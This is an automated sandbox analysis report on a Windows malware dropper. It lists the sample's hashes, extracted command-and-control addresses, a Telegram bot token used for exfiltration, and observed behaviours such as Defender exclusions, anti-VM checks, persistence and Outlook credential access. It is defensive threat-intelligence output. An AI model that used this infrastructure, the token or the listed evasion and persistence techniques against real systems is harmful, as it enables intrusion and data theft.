Analysis
-
max time kernel
30s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-11-2024 02:31
Static task
static1
Behavioral task
behavioral1
Sample
5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
Resource
win10v2004-20241007-en
General
-
Target
5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe
-
Size
1.9MB
-
MD5
3204e7adeb4d554e74b4aeb310cc5939
-
SHA1
8a2a99bd088af5024c5b18f6cec3e7ec6cb460bc
-
SHA256
5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12
-
SHA512
699307161af2ce71c6ad91f7347383cd45872e0de2492db2586a09fe7d2bb5bbca7757b7f2b2c4b89a30a1023d1812b29e937d7ebb606b43b502047b030a8f43
-
SSDEEP
49152:O4/csNlzfLamxFm9gl1WeIunPf03FJYev12xe:OCcS1R26Bt83PvUx
Malware Config
Extracted
http://176.113.115.178/FF/3.png
Extracted
http://176.113.115.178/FF/2.png
Extracted
http://176.113.115.178/Windows-Update
Extracted
http://176.113.115.178/FF/1.png
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
xworm
87.120.112.33:8398
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
-
telegram
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Extracted
stealc
mars
http://185.215.113.206
-
url_path
/c4becf79229cb002.php
Extracted
gurcu
https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579
Signatures
-
Amadey family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023cb0-3276.dat family_xworm behavioral2/memory/1828-4483-0x0000000000A90000-0x0000000000AA8000-memory.dmp family_xworm -
Gurcu family
-
Stealc family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cb913a9fce.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ L.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a381714d22.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 38 1736 powershell.exe 39 1516 powershell.exe 47 4312 mshta.exe 50 4280 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 7032 powershell.exe 6148 powershell.exe 5912 powershell.exe 4244 powershell.exe 5788 powershell.exe 400 powershell.exe 4452 powershell.exe 1736 powershell.exe 1516 powershell.exe 4280 powershell.exe 7100 powershell.exe 3608 powershell.exe 7100 powershell.exe 1508 powershell.exe 5512 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Uses browser remote debugging 2 TTPs 1 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 208 chrome.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Mig.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a381714d22.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion L.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion LB31.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cb913a9fce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a381714d22.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cb913a9fce.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation skotes.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation document.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk document.exe -
Executes dropped EXE 12 IoCs
pid Process 2160 skotes.exe 1204 L.exe 380 file.exe 948 FunnyJellyfish.exe 5304 FunnyJellyfish.tmp 1828 document.exe 5720 FunnyJellyfish.exe 1540 FunnyJellyfish.tmp 6188 a381714d22.exe 6476 LB31.exe 5932 Mig.exe 1740 cb913a9fce.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine L.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine a381714d22.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine cb913a9fce.exe -
Loads dropped DLL 2 IoCs
pid Process 1960 regsvr32.exe 6256 regsvr32.exe -
Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook RegSvcs.exe Key queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Local\\svchost.exe" document.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2904 powercfg.exe 6448 powercfg.exe 4728 powercfg.exe 6136 powercfg.exe 5088 powercfg.exe 4068 powercfg.exe 5364 powercfg.exe 3844 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023cd2-8879.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe Mig.exe File opened for modification C:\Windows\system32\MRT.exe LB31.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 2160 skotes.exe 1204 L.exe 6188 a381714d22.exe 1740 cb913a9fce.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1736 set thread context of 3620 1736 powershell.exe 109 PID 6476 set thread context of 5668 6476 LB31.exe 160 PID 5932 set thread context of 5316 5932 Mig.exe 196 PID 5932 set thread context of 6272 5932 Mig.exe 198 PID 5932 set thread context of 5420 5932 Mig.exe 199 -
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File created C:\Windows\Tasks\skotes.job 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5600 sc.exe 3856 sc.exe 5800 sc.exe 5840 sc.exe 2308 sc.exe 7004 sc.exe 448 sc.exe 5904 sc.exe 7160 sc.exe 2360 sc.exe 644 sc.exe 4420 sc.exe 2276 sc.exe 1948 sc.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 6992 6188 WerFault.exe 124 -
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language L.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cb913a9fce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FunnyJellyfish.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a381714d22.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1352 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 348 ipconfig.exe -
Kills process with taskkill 5 IoCs
pid Process 6596 taskkill.exe 6916 taskkill.exe 6088 taskkill.exe 6972 taskkill.exe 6232 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings powershell.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5388 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1828 document.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 3672 5e25eba0727eb361d518125ef6bad9f834d4c7d91d35edb4b93ee0decaca6c12.exe 2160 skotes.exe 2160 skotes.exe 1204 L.exe 1204 L.exe 1736 powershell.exe 1736 powershell.exe 1516 powershell.exe 1516 powershell.exe 4280 powershell.exe 4280 powershell.exe 4280 powershell.exe 5788 powershell.exe 5788 powershell.exe 5788 powershell.exe 1540 FunnyJellyfish.tmp 1540 FunnyJellyfish.tmp 6256 regsvr32.exe 6256 regsvr32.exe 6188 a381714d22.exe 6188 a381714d22.exe 6256 regsvr32.exe 400 powershell.exe 400 powershell.exe 6256 regsvr32.exe 6256 regsvr32.exe 6256 regsvr32.exe 400 powershell.exe 3608 powershell.exe 3608 powershell.exe 3608 powershell.exe 4452 powershell.exe 4452 powershell.exe 4452 powershell.exe 7032 powershell.exe 7032 powershell.exe 7100 powershell.exe 7100 powershell.exe 7032 powershell.exe 7100 powershell.exe 6476 LB31.exe 6148 powershell.exe 6148 powershell.exe 6148 powershell.exe 5912 powershell.exe 5912 powershell.exe 5912 powershell.exe 6476 LB31.exe 6476 LB31.exe 6256 regsvr32.exe 6256 regsvr32.exe 6256 regsvr32.exe 6256 regsvr32.exe 6256 regsvr32.exe 6256 regsvr32.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe 6476 LB31.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
